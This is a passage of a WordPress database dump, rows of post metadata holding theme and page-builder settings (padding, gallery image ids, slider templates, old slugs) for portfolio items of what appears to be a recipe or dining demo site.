Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53662,3076,'mkdf_portfolio_single_template_meta','small-images'),(53663,3076,'_wp_old_slug','h1-2'),(53664,3077,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53665,3077,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53666,3077,'_thumbnail_id','138'),(53667,3077,'mkdf_page_content_behind_header_meta','no'),(53668,3077,'mkdf_page_content_padding','115px 0 100px 0'),(53669,3077,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53670,3077,'portfolio_single_back_to_link','81'),(53671,3077,'mkdf_disable_vertical_header_background_image_meta','no'),(53672,3077,'mkdf_disable_header_widget_areas_meta','no'),(53673,3077,'slide_template','default'),(53674,3077,'_wpb_vc_js_status','true'),(53675,3077,'_dp_original','104'),(53676,3077,'mkdf-portfolio-image-gallery','1901,1902,1903'),(53677,3077,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53678,3077,'mkdf_portfolio_single_template_meta','slider'),(53679,3077,'_wp_old_slug','h1-3'),(53680,3077,'_wp_old_slug','homemade-dining'),(53681,3078,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53682,3078,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53683,3078,'_thumbnail_id','571'),(53684,3078,'mkdf_page_content_behind_header_meta','no'),(53685,3078,'mkdf_page_content_padding','115px 0 100px 0'),(53686,3078,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53687,3078,'portfolio_single_back_to_link','569'),(53688,3078,'mkdf_disable_vertical_header_background_image_meta','no'),(53689,3078,'mkdf_disable_header_widget_areas_meta','no'),(53690,3078,'slide_template','default'),(53691,3078,'_wpb_vc_js_status','true'),(53692,3078,'mkdf-portfolio-image-gallery','565,566,567'),(53693,3078,'mkdf_portfolio_single_template_meta','small-slider'),(53694,3078,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53695,3078,'_dp_original','104'),(53696,3078,'_wp_old_slug','h8-1'),(53697,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53698,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53699,3079,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53700,3079,'mkdf_page_content_behind_header_meta','no'),(53701,3079,'mkdf_page_content_padding','115px 0 100px 0'),(53702,3079,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53703,3079,'portfolio_single_back_to_link','569'),(53704,3079,'mkdf_disable_vertical_header_background_image_meta','no'),(53705,3079,'mkdf_disable_header_widget_areas_meta','no'),(53706,3079,'slide_template','default'),(53707,3079,'_wpb_vc_js_status','true'),(53708,3079,'mkdf-portfolio-image-gallery','567,566,565'),(53709,3079,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53710,3079,'mkdf_portfolio_single_template_meta','gallery'),(53711,3079,'_dp_original','136'),(53712,3079,'_thumbnail_id','587'),(53713,3079,'_wp_old_slug','h8-2'),(53714,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53715,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53716,3080,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53717,3080,'_thumbnail_id','584'),(53718,3080,'mkdf_page_content_behind_header_meta','no'),(53719,3080,'mkdf_page_content_padding','115px 0 100px 0'),(53720,3080,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53721,3080,'portfolio_single_back_to_link','569'),(53722,3080,'mkdf_disable_vertical_header_background_image_meta','no'),(53723,3080,'mkdf_disable_header_widget_areas_meta','no'),(53724,3080,'slide_template','default'),(53725,3080,'_wpb_vc_js_status','true'),(53726,3080,'mkdf-portfolio-image-gallery','567,566,565'),(53727,3080,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53728,3080,'mkdf_portfolio_single_template_meta','small-images'),(53729,3080,'_dp_original','141'),(53730,3080,'_wp_old_slug','h8-3'),(53731,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53732,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53733,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53734,3081,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53735,3081,'_thumbnail_id','589'),(53736,3081,'mkdf_page_content_behind_header_meta','no'),(53737,3081,'mkdf_page_content_padding','115px 0 100px 0'),(53738,3081,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53739,3081,'portfolio_single_back_to_link','569'),(53740,3081,'mkdf_disable_vertical_header_background_image_meta','no'),(53741,3081,'mkdf_disable_header_widget_areas_meta','no'),(53742,3081,'slide_template','default'),(53743,3081,'_wpb_vc_js_status','true'),(53744,3081,'mkdf-portfolio-image-gallery','567,566,565'),(53745,3081,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53746,3081,'mkdf_portfolio_single_template_meta','masonry'),(53747,3081,'_dp_original','583'),(53748,3081,'_wp_old_slug','h8-4'),(53749,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53750,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53751,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53752,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53753,3082,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53754,3082,'_thumbnail_id','591'),(53755,3082,'mkdf_page_content_behind_header_meta','no'),(53756,3082,'mkdf_page_content_padding','115px 0 100px 0'),(53757,3082,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53758,3082,'portfolio_single_back_to_link','569'),(53759,3082,'mkdf_disable_vertical_header_background_image_meta','no'),(53760,3082,'mkdf_disable_header_widget_areas_meta','no'),(53761,3082,'slide_template','default'),(53762,3082,'_wpb_vc_js_status','true'),(53763,3082,'mkdf-portfolio-image-gallery','567,566,565'),(53764,3082,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53765,3082,'mkdf_portfolio_single_template_meta','slider'),(53766,3082,'_dp_original','588'),(53767,3082,'_wp_old_slug','h8-5'),(53768,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53769,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53770,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53771,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53772,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53773,3083,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53774,3083,'mkdf_page_content_behind_header_meta','no'),(53775,3083,'mkdf_page_content_padding','115px 0 100px 0'),(53776,3083,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53777,3083,'portfolio_single_back_to_link','569'),(53778,3083,'mkdf_disable_vertical_header_background_image_meta','no'),(53779,3083,'mkdf_disable_header_widget_areas_meta','no'),(53780,3083,'slide_template','default'),(53781,3083,'_wpb_vc_js_status','true'),(53782,3083,'mkdf-portfolio-image-gallery','567,566,565'),(53783,3083,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53784,3083,'mkdf_portfolio_single_template_meta','small-slider'),(53785,3083,'_dp_original','590'),(53786,3083,'_thumbnail_id','594'),(53787,3083,'_wp_old_slug','h8-6'),(53788,618,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53789,618,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53790,618,'mkdf_page_content_behind_header_meta','no'),(53791,618,'mkdf_page_content_padding','115px 0 100px 0'),(53792,618,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53793,618,'portfolio_single_back_to_link','610'),(53794,618,'mkdf_disable_vertical_header_background_image_meta','no'),(53795,618,'mkdf_disable_header_widget_areas_meta','no'),(53796,618,'slide_template','default'),(53797,618,'_wpb_vc_js_status','false'),(53798,618,'mkdf-portfolio-image-gallery','565,566,567'),(53799,618,'mkdf_portfolio_single_template_meta','images'),(53800,618,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53801,618,'_dp_original','104'),(53802,618,'_thumbnail_id','1095'),(53803,618,'_wp_old_slug','h6-1'),(53804,618,'_wp_old_slug','cold-raspberry-soup'),(53805,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53806,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53807,3084,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53808,3084,'mkdf_page_content_behind_header_meta','no'),(53809,3084,'mkdf_page_content_padding','115px 0 100px 0'),(53810,3084,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53811,3084,'portfolio_single_back_to_link','610'),(53812,3084,'mkdf_disable_vertical_header_background_image_meta','no'),(53813,3084,'mkdf_disable_header_widget_areas_meta','no'),(53814,3084,'slide_template','default'),(53815,3084,'_wpb_vc_js_status','true'),(53816,3084,'mkdf-portfolio-image-gallery','567,566,565'),(53817,3084,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53818,3084,'mkdf_portfolio_single_template_meta','small-images'),(53819,3084,'_dp_original','136'),(53820,3084,'_thumbnail_id','1096'),(53821,3084,'_wp_old_slug','h6-2'),(53822,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53823,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53824,3085,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53825,3085,'mkdf_page_content_behind_header_meta','no'),(53826,3085,'mkdf_page_content_padding','115px 0 100px 0'),(53827,3085,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53828,3085,'portfolio_single_back_to_link','610'),(53829,3085,'mkdf_disable_vertical_header_background_image_meta','no'),(53830,3085,'mkdf_disable_header_widget_areas_meta','no'),(53831,3085,'slide_template','default'),(53832,3085,'_wpb_vc_js_status','true'),(53833,3085,'mkdf-portfolio-image-gallery','567,566,565'),(53834,3085,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53835,3085,'mkdf_portfolio_single_template_meta','slider'),(53836,3085,'_dp_original','141'),(53837,3085,'_thumbnail_id','1098'),(53838,3085,'_wp_old_slug','h6-3'),(53839,3085,'_wp_old_slug','that-croissant'),(53840,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53841,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53842,3086,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53843,3086,'mkdf_page_content_behind_header_meta','no'),(53844,3086,'mkdf_page_content_padding','115px 0 100px 0'),(53845,3086,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53846,3086,'portfolio_single_back_to_link','610'),(53847,3086,'mkdf_disable_vertical_header_background_image_meta','no'),(53848,3086,'mkdf_disable_header_widget_areas_meta','no'),(53849,3086,'slide_template','default'),(53850,3086,'_wpb_vc_js_status','true'),(53851,3086,'mkdf-portfolio-image-gallery','565,566,567'),(53852,3086,'mkdf_portfolio_single_template_meta','small-slider'),(53853,3086,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53854,3086,'_dp_original','568'),(53855,3086,'_thumbnail_id','1097'),(53856,3086,'_wp_old_slug','h6-4'),(53857,3086,'_wp_old_slug','cream-soup'),(53858,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53859,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53860,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53861,3087,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53862,3087,'mkdf_page_content_behind_header_meta','no'),(53863,3087,'mkdf_page_content_padding','115px 0 100px 0'),(53864,3087,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53865,3087,'portfolio_single_back_to_link','610'),(53866,3087,'mkdf_disable_vertical_header_background_image_meta','no'),(53867,3087,'mkdf_disable_header_widget_areas_meta','no'),(53868,3087,'slide_template','default'),(53869,3087,'_wpb_vc_js_status','true'),(53870,3087,'mkdf-portfolio-image-gallery','567,566,565'),(53871,3087,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53872,3087,'mkdf_portfolio_single_template_meta','gallery'),(53873,3087,'_dp_original','580'),(53874,3087,'_thumbnail_id','1099'),(53875,3087,'_wp_old_slug','h6-5'),(53876,3088,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53877,3088,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53878,3088,'mkdf_page_content_behind_header_meta','no'),(53879,3088,'mkdf_page_content_padding','115px 0 100px 0'),(53880,3088,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53881,3088,'portfolio_single_back_to_link','610'),(53882,3088,'mkdf_disable_vertical_header_background_image_meta','no'),(53883,3088,'mkdf_disable_header_widget_areas_meta','no'),(53884,3088,'slide_template','default'),(53885,3088,'_wpb_vc_js_status','false'),(53886,3088,'mkdf-portfolio-image-gallery','565,566,567'),(53887,3088,'mkdf_portfolio_single_template_meta','images'),(53888,3088,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53889,3088,'_dp_original','104'),(53890,3088,'_thumbnail_id','1101'),(53891,3088,'_wp_old_slug','h6-7'),(53892,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53893,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53894,3089,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53895,3089,'mkdf_page_content_behind_header_meta','no'),(53896,3089,'mkdf_page_content_padding','115px 0 100px 0'),(53897,3089,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53898,3089,'portfolio_single_back_to_link','610'),(53899,3089,'mkdf_disable_vertical_header_background_image_meta','no'),(53900,3089,'mkdf_disable_header_widget_areas_meta','no'),(53901,3089,'slide_template','default'),(53902,3089,'_wpb_vc_js_status','true'),(53903,3089,'mkdf-portfolio-image-gallery','567,566,565'),(53904,3089,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53905,3089,'mkdf_portfolio_single_template_meta','small-images'),(53906,3089,'_dp_original','136'),(53907,3089,'_thumbnail_id','1121'),(53908,3089,'_wp_old_slug','h6-6'),(53909,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53910,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53911,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53912,3090,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53913,3090,'mkdf_page_content_behind_header_meta','no'),(53914,3090,'mkdf_page_content_padding','115px 0 100px 0'),(53915,3090,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53916,3090,'portfolio_single_back_to_link','610'),(53917,3090,'mkdf_disable_vertical_header_background_image_meta','no'),(53918,3090,'mkdf_disable_header_widget_areas_meta','no'),(53919,3090,'slide_template','default'),(53920,3090,'_wpb_vc_js_status','true'),(53921,3090,'mkdf-portfolio-image-gallery','567,566,565'),(53922,3090,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53923,3090,'mkdf_portfolio_single_template_meta','small-images'),(53924,3090,'_dp_original','649'),(53925,3090,'_thumbnail_id','1102'),(53926,3090,'_wp_old_slug','h6-8'),(53927,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53928,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53929,3091,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53930,3091,'mkdf_page_content_behind_header_meta','no'),(53931,3091,'mkdf_page_content_padding','115px 0 100px 0'),(53932,3091,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53933,3091,'portfolio_single_back_to_link','610'),(53934,3091,'mkdf_disable_vertical_header_background_image_meta','no'),(53935,3091,'mkdf_disable_header_widget_areas_meta','no'),(53936,3091,'slide_template','default'),(53937,3091,'_wpb_vc_js_status','false'),(53938,3091,'mkdf-portfolio-image-gallery','565,566,567'),(53939,3091,'mkdf_portfolio_single_template_meta','images'),(53940,3091,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53941,3091,'_dp_original','648'),(53942,3091,'_thumbnail_id','1103'),(53943,3091,'_wp_old_slug','h6-9'),(53944,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53945,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53946,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53947,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53948,2843,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53949,2843,'_wp_page_template','full-width.php'),(53950,2843,'slide_template','default'),(53951,2843,'_wpb_vc_js_status','true'),(53952,2843,'mkdf_page_content_behind_header_meta','no'),(53953,2843,'mkdf_page_content_padding','30px 30px 50px 30px'),(53954,2843,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(53955,2843,'mkdf_disable_vertical_header_background_image_meta','no'),(53956,2843,'mkdf_disable_header_widget_areas_meta','no'),(53957,2843,'mkdf_title_area_type_meta','attika'),(53958,2843,'_dp_original','1192'),(53959,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53960,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53961,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53962,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53963,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53964,2857,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53965,2857,'_wp_page_template','full-width.php'),(53966,2857,'slide_template','default'),(53967,2857,'_wpb_vc_js_status','true'),(53968,2857,'mkdf_page_content_behind_header_meta','no'),(53969,2857,'mkdf_page_content_padding','30px 30px 50px 30px'),(53970,2857,'mkdf_page_content_padding_mobile','30px 30px 50px 30px'),(53971,2857,'mkdf_disable_vertical_header_background_image_meta','no'),(53972,2857,'mkdf_disable_header_widget_areas_meta','no'),(53973,2857,'mkdf_title_area_type_meta','attika'),(53974,2857,'_dp_original','2843'),(53975,3092,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53976,3092,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53977,3092,'_thumbnail_id','2720'),(53978,3092,'mkdf_page_content_behind_header_meta','no'),(53979,3092,'mkdf_page_content_padding','115px 0 100px 0'),(53980,3092,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53981,3092,'portfolio_single_back_to_link','664'),(53982,3092,'mkdf_disable_vertical_header_background_image_meta','no'),(53983,3092,'mkdf_disable_header_widget_areas_meta','no'),(53984,3092,'slide_template','default'),(53985,3092,'_wpb_vc_js_status','false'),(53986,3092,'mkdf-portfolio-image-gallery','565,566,567'),(53987,3092,'mkdf_portfolio_single_template_meta','images'),(53988,3092,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(53989,3092,'_dp_original','104'),(53990,3092,'_wp_old_slug','h4-1'),(53991,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53992,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53993,3093,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(53994,3093,'_thumbnail_id','2721'),(53995,3093,'mkdf_page_content_behind_header_meta','no'),(53996,3093,'mkdf_page_content_padding','115px 0 100px 0'),(53997,3093,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(53998,3093,'portfolio_single_back_to_link','664'),(53999,3093,'mkdf_disable_vertical_header_background_image_meta','no'),(54000,3093,'mkdf_disable_header_widget_areas_meta','no'),(54001,3093,'slide_template','default'),(54002,3093,'_wpb_vc_js_status','true'),(54003,3093,'mkdf-portfolio-image-gallery','567,566,565'),(54004,3093,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54005,3093,'mkdf_portfolio_single_template_meta','small-images'),(54006,3093,'_dp_original','136'),(54007,3093,'_wp_old_slug','h4-2'),(54008,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54009,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54010,3094,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54011,3094,'_thumbnail_id','2722'),(54012,3094,'mkdf_page_content_behind_header_meta','no'),(54013,3094,'mkdf_page_content_padding','115px 0 100px 0'),(54014,3094,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54015,3094,'portfolio_single_back_to_link','664'),(54016,3094,'mkdf_disable_vertical_header_background_image_meta','no'),(54017,3094,'mkdf_disable_header_widget_areas_meta','no'),(54018,3094,'slide_template','default'),(54019,3094,'_wpb_vc_js_status','true'),(54020,3094,'mkdf-portfolio-image-gallery','567,566,565'),(54021,3094,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54022,3094,'mkdf_portfolio_single_template_meta','slider'),(54023,3094,'_dp_original','141'),(54024,3094,'_wp_old_slug','h4-3'),(54025,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54026,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54027,3095,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54028,3095,'_thumbnail_id','1059'),(54029,3095,'mkdf_page_content_behind_header_meta','no'),(54030,3095,'mkdf_page_content_padding','115px 0 100px 0'),(54031,3095,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54032,3095,'portfolio_single_back_to_link','84'),(54033,3095,'mkdf_disable_vertical_header_background_image_meta','no'),(54034,3095,'mkdf_disable_header_widget_areas_meta','no'),(54035,3095,'slide_template','default'),(54036,3095,'_wpb_vc_js_status','true'),(54037,3095,'mkdf-portfolio-image-gallery','567,566,565'),(54038,3095,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54039,3095,'mkdf_portfolio_single_template_meta','small-images'),(54040,3095,'_dp_original','136'),(54041,3095,'_wp_old_slug','h1-2-2'),(54042,3095,'_wp_old_slug','h2-1'),(54043,3095,'_wp_old_slug','h2-4'),(54044,3095,'_wp_old_slug','kakalamba-appetizer'),(54045,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54046,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54047,3096,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54048,3096,'_thumbnail_id','1058'),(54049,3096,'mkdf_page_content_behind_header_meta','no'),(54050,3096,'mkdf_page_content_padding','115px 0 100px 0'),(54051,3096,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54052,3096,'portfolio_single_back_to_link','84'),(54053,3096,'mkdf_disable_vertical_header_background_image_meta','no'),(54054,3096,'mkdf_disable_header_widget_areas_meta','no'),(54055,3096,'slide_template','default'),(54056,3096,'_wpb_vc_js_status','true'),(54057,3096,'mkdf-portfolio-image-gallery','567,566,565'),(54058,3096,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:10:\"John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54059,3096,'mkdf_portfolio_single_template_meta','slider'),(54060,3096,'_dp_original','141'),(54061,3096,'_wp_old_slug','h2-3'),(54062,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54063,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54064,3097,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54065,3097,'_thumbnail_id','1057'),(54066,3097,'mkdf_page_content_behind_header_meta','no'),(54067,3097,'mkdf_page_content_padding','115px 0 100px 0'),(54068,3097,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54069,3097,'portfolio_single_back_to_link','84'),(54070,3097,'mkdf_disable_vertical_header_background_image_meta','no'),(54071,3097,'mkdf_disable_header_widget_areas_meta','no'),(54072,3097,'slide_template','default'),(54073,3097,'_wpb_vc_js_status','true'),(54074,3097,'mkdf-portfolio-image-gallery','565,566,567'),(54075,3097,'mkdf_portfolio_single_template_meta','small-slider'),(54076,3097,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(54077,3097,'_dp_original','568'),(54078,3097,'_wp_old_slug','h2-2'),(54079,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54080,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54081,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54082,3098,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(54083,3098,'mkdf_page_content_behind_header_meta','no'),(54084,3098,'mkdf_page_content_padding','115px 0 100px 0'),(54085,3098,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(54086,3098,'portfolio_single_back_to_link','84'),(54087,3098,'mkdf_disable_vertical_header_background_image_meta','no'),(54088,3098,'mkdf_disable_header_widget_areas_meta','no'),(54089,3098,'slide_template','default'),(54090,3098,'_wpb_vc_js_status','true'),(54091,3098,'mkdf-portfolio-image-gallery','567,566,565'),(54092,3098,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John 